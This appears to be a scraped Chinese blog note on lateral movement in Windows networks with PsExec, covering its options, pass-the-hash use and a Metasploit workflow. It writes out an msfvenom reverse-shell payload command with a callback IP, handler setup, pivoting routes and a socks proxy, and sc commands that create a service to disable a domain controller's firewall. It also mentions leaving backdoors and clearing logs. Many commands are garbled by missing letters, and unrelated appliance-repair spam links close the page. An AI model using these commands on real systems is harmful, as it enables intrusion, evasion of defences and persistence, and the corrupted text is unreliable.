内网横移之PsExec
PsExec 特点(缺点)
- 需要对方开启ADMIN$共享
- 需要安装服务,会留下日志被发现
- 有可能退出时服务删除失败
- 半交互shell,不能执行实时交互的命令
PsExec - Windos Sysinternals | Microsoft DocsPsExec | ITPro Today: IT Nes, Ho-Tos, Trends, Case Studies, Career Tips, More
简介PsExec 是一个命令行工具,可让用户在远程系统上执行进程,并将输出重定向到本地,以便这些应用程序看起来在本地运行
psexec无需在远程系统上手动安装软件,执行命令默认查找远程系统的indossystem32目录,-c可将本地程序复制到目标系统
原理PsExec 通过从其可执行映像中提取名为 Psexesvc 的嵌入式 Windos 服务,并将其复制到远程系统的 Admin$ 共享
然后 PsExec 使用具有远程接口的 Windos 服务控制管理器 API 来启动远程系统上的 Psexesvc 服务(运行结束后删除)
Psexesvc 服务创建一个名为psexecsvc的管道,PsExec 连接到该管道并发送命令,告诉远程系统上的服务目标程序和提供的选项
使用前提- 对⽅主机开启了 admin$ 共享(默认开启),如果关闭则会提示找不到⽹络名
- 对⽅未开启防⽕墙
- 如果是⼯作组环境,则必须使⽤administrator⽤户连接(因为要在⽬标主机上⾯创建并启动服务)
- 如果是域环境,连接普通域主机可以⽤普通域⽤户,连接域控只能⽤域管理员账户。
PsExec.exe \\ip -u username -p passord -i cmd \c mand PTH运行cmd(必须加-i否则报错无权限) chcp 65001 解决乱码 936简体中文 psexec \\ip -c test.exe 将程序test.exe复制到远程系统并以交互方式执行 psexec \\ip c:\bin\test.exe 不复制,指定运行远程系统目标路径程序 psexec -i -d -s c:\indos\regedit.exe 在系统帐户中以交互方式运行Regedit以查看SAM和SECURITY密钥的内容 psexec -l -d“c:\program files\inter explorer\iexplore.exe”使用受限用户权限运行目标程序常用选项
二、msf中的psexec利用 弹shell-c 将本地文件复制到远程系统执行,执行后删除
-f 复制指定的程序,即使远程系统上已存在该文件
-d 不等待进程终止 ,启动文件后直接退出(非交互式)
-i 以交互方式运行控制台应用程序
-l 以受限用户运行(低权限)
-s 在系统帐户中运行远程进程(高权限)
-u 指定用户名
-p 指定密码(若省略,系统会进行提示)
-h 以管理员权限运行
//其他详见官方文档
木马生成 msfvenom -p indos/meterpreter/reverse_tcp LHOST=192.168.10.11 LPORT=4444 -f exe > abc.exe 设置监听 use expolit/multi/handler ,set payload indos/meterpreter/reverse_tcp内网信息搜集
shell ,chcp 65001 , user /domain
添加内网路由msf route add <内网段>抓取密码,psexec模块pth:, route printe sessionrun autoroute -s <内网段>/<掩码位> , run autoroute -p 两个跑一个就行
use exploit/indos/smb/psexec (psexec_psh 由poershell实现,免杀较好) set payload indos/meterpreter/bind_tcp 配置参数,运行弹shell
pth弹shell失败,防火墙阻止了端口流量的进出:
可通过ipc连接关闭DC防火墙 use \\ip\ipc$ passord /user:administrator 建立链接 sc \\ip create unablefireall binpath= "sh advfireall set allprofiles state off" # 创建计划任务关闭防火墙 sc \\ip start unablefireall 立即启动服务 使用sh关闭防火墙 sh advfireall fireall add rule name="f.exe" dir=in program="e:\f.exe" action=allosh advfireall fireall delete rule name="f.exe"开启远程桌面:
使用socks代理
use auxiliary/server/socks_4a use auxiliary/server/socks_proxt set viersion 4a
配置proxychain文件
末尾添加socks4 <本地ip> 1080
kali路径/etc/proxychains.conf
添加内网段路由
run autoroute -s 192.168.138.0/24 ,run autoroute -p
连接远程桌面
proxychain4 rdesk <目的ip>
留后门,清日志
详细渗透流程简单的内网渗透靶场实战(tp漏洞、msf、psexec横向渗透、权限维持)_eb安全工具库的博客-CSDN博客_tp漏洞
三、psexec.py基本用法
python psexec.py -hashes LM:NT
基本选项
-c 将本地文件复制到远程系统执行,执行后删除
-path 指定命令的路径
-dc-ip 设置域控ip
-target-ip 设置目标ip
-port 设置目标smb端口(默认445)
空调维修
- 温岭冰箱全国统一服务热线-全国统一人工【7X2
- 荆州速热热水器维修(荆州热水器维修)
- 昆山热水器故障码5ER-昆山热水器故障码26
- 温岭洗衣机24小时服务电话—(7X24小时)登记报
- 统帅热水器售后维修服务电话—— (7X24小时)登
- 阳江中央空调统一电话热线-阳江空调官方售后电
- 乌鲁木齐阳春燃气灶厂家服务热线
- 珠海许昌集成灶售后服务电话-全国统一人工【
- 乌鲁木齐中央空调维修服务专线-乌鲁木齐中央空
- 新沂热水器故障电话码维修-新沂热水器常见故障
- 诸城壁挂炉24小时服务热线电话
- 靖江空调24小时服务电话-——售后维修中心电话
- 空调室外滴水管维修(空调室外排水管维修)
- 九江壁挂炉400全国服务电话-(7X24小时)登记报修
- 热水器故障码f.22怎么解决-热水器f0故障解决方法
- 营口热水器售后维修服务电话—— 全国统一人工